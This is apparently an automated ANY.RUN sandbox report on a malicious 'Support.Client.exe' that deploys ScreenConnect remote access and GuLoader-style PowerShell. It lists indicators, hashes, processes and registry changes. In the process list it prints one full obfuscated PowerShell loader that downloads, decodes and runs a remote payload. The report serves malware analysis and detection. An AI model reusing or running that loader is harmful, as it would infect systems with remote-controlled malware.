download:

/Bin/Support.Client.exe

Full analysis: https://app.any.run/tasks/cedf1cb8-4fa0-480c-bf09-0a848ce7bb75
Verdict: Malicious activity
Analysis date: November 22, 2024, 02:41:16
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
screenconnect
gumen
opendir
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

4880859A2C9B435D099872AE8C1441A1

SHA1:

1169D35C13F132E0CDD33A37475892B5781CB36F

SHA256:

F304FD8FFCEDC0B6BDD03DD8B1DF876A4A9886AF2635BE4F63354A5BA4E53125

SSDEEP:

1536:ohNeDLHPUVkKo2cgigKIhTnH2QjCdqQsWQcdUkBbfq7NK:vDLHcVkKo2cZgKIhTH2U+lU2bfq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GUMEN has been detected

      • powershell.exe (PID: 7016)
      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 7104)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 7116)
      • powershell.exe (PID: 6552)
      • powershell.exe (PID: 6592)
      • powershell.exe (PID: 2260)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7016)

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 6644)

  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Support.Client.exe (PID: 4740)

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 3856)

    • Checks Windows Trust Settings

      • dfsvc.exe (PID: 3856)

    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 3856)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 3856)

    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 6644)

    • Executing commands from ".cmd" file

      • ScreenConnect.ClientService.exe (PID: 6644)
      • msiexec.exe (PID: 5124)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6976)
      • wscript.exe (PID: 6796)
      • wscript.exe (PID: 828)
      • wscript.exe (PID: 6116)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 6976)

    • Application launched itself

      • ScreenConnect.WindowsClient.exe (PID: 6720)

    • The process executes VB scripts

      • ScreenConnect.WindowsClient.exe (PID: 5372)
      • ScreenConnect.WindowsClient.exe (PID: 5752)
      • ScreenConnect.WindowsClient.exe (PID: 6600)
      • msiexec.exe (PID: 6320)

    • Starts CMD.EXE for commands execution

      • ScreenConnect.ClientService.exe (PID: 6644)
      • msiexec.exe (PID: 5124)
      • msiexec.exe (PID: 6320)

    • Executes application which crashes

      • Support.Client.exe (PID: 4740)
      • msiexec.exe (PID: 5124)

    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 6644)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5496)
      • cmd.exe (PID: 5548)

    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 6644)

  • INFO

    • Checks supported languages

      • dfsvc.exe (PID: 3856)
      • Support.Client.exe (PID: 4740)

    • Reads the machine GUID from the registry

      • Support.Client.exe (PID: 4740)
      • dfsvc.exe (PID: 3856)

    • Reads the computer name

      • Support.Client.exe (PID: 4740)
      • dfsvc.exe (PID: 3856)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 3856)

    • Reads Environment values

      • dfsvc.exe (PID: 3856)

    • Disables trace logs

      • dfsvc.exe (PID: 3856)

    • Checks proxy server information

      • dfsvc.exe (PID: 3856)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 3856)

    • Reads the software policy settings

      • dfsvc.exe (PID: 3856)

    • Sends debugging messages

      • dfsvc.exe (PID: 3856)

    • The process uses the downloaded file

      • dfsvc.exe (PID: 3856)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 3856)

    • Manual execution by a user

      • powershell.exe (PID: 6284)
      • powershell.exe (PID: 7104)
      • powershell.exe (PID: 7116)
      • powershell.exe (PID: 2260)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6796)
      • wscript.exe (PID: 828)
      • wscript.exe (PID: 6116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:10:28 17:41:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.39
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
181
Monitored processes
48
Malicious processes
10
Suspicious processes
6

Behavior graph

Click at the process to see the details
start support.client.exe dfsvc.exe svchost.exe screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs conhost.exe no specs cmd.exe no specs #GUMEN powershell.exe conhost.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs screenconnect.windowsclient.exe no specs wscript.exe no specs #GUMEN powershell.exe conhost.exe no specs #GUMEN powershell.exe conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs werfault.exe #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs msiexec.exe textinputhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs reg.exe no specs werfault.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
828"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs" C:\Windows\System32\wscript.exeScreenConnect.WindowsClient.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1588C:\WINDOWS\SysWOW64\WerFault.exe -u -p 4740 -s 912C:\Windows\SysWOW64\WerFault.exe
Support.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2260"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2420"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mcaC:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Version:
123.26505.0.0
2548\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
2928"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
3632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Total events
40 631
Read events
40 416
Write events
185
Delete events
30

Modification events

(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(4740) Support.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
820B1NQP1N0HHPBB1Y27AR7N
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
820B1NQP1N0HHPBB1Y27AR7N
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
5LQ1YK6QPW3V9QQCJ1KYZ9CA
